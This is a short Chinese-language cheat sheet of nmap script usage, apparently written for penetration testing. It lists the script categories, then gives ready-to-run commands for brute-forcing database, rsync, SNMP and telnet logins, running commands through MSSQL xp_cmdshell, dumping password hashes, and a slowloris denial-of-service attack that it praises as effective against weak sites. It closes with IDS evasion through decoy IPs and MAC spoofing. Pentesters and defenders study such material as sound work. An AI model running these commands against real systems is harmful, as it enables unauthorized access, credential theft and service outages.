一些常用腳本用法
nmap 腳本一些支持籠統掃描 usag. nmap -F --script auth 10.0.0.1
auth: 負責處理鑒權證書(繞開鑒權)的腳本
broadcast: 在局域網內探查更多服務開啟狀況,如 dhcp/dns/sqlserver 等服務
brute: 提供暴力破解方式,針對常見的應用如 http/snmp 等
default: 提供基本腳本掃描能力
discovery: 對網絡進行更多的信息,如 SMB 枚舉、SNMP 查詢等
dos: 用於進行拒絕服務攻擊
exploit: 利用已知的漏洞入侵系統
external: 利用第三方的數據庫或資源,例如進行 whois 解析
fuzzer: 模糊測試的腳本,發送異常的包到目標機,探測出潛在漏洞
intrusive: 入侵性的腳本,此類腳本可能引發對方的 IDS/IPS 的記錄或屏蔽
malware: 探測目標機是否感染了病毒、開啟了后門等信息
safe: 此類與 intrusive 相反,屬於安全性腳本
version: 負責增強服務與版本掃描(Version Detection)功能的腳本
vuln: 負責檢查目標機是否有常見的漏洞(Vulnerability),如是否有 MS08_067
腳本用法:
猜解 mssql 用戶名和密碼
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 10.0.0.1
xp_cmdshell 執行命令
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 10.0.0.1
nmap -p 1433 10.0.0.1 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=123456 xp_cmdshell 執行命令
nmap --script=broadcast-netbios-master-browser 10.0.0.1
發現網關
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 10.0.0.1
破解 rsync
nmap --script informix-brute -p 9088 10.0.0.1 informix 數據庫破解
nmap -p 5432 --script pgsql-brute 10.0.0.1 pgsql 破解
nmap -sU --script snmp-brute 10.0.0.1 snmp 破解
nmap -sV --script=telnet-brute 10.0.0.1 telnet 破解
nmap --script=http-methods.nse 10.0.0.1 檢查 http 方法
nmap --script http-slowloris --max-parallelism 400 10.0.0.1 dos 攻擊,對於處理能力較小的站點還挺好用的
一些 IDS 規避用法
nmap -F -D 10.0.0.2,ME 10.0.0.1 偽造 ip 進行掃描 偽造 ip 主機必須存活,ME 代表自己 ip
nmap --spoof-mac 01:02:AE:0F,0,APPLE -F 10.0.01 偽造 mac mac 地址,mac 首字母,mac 所屬公司
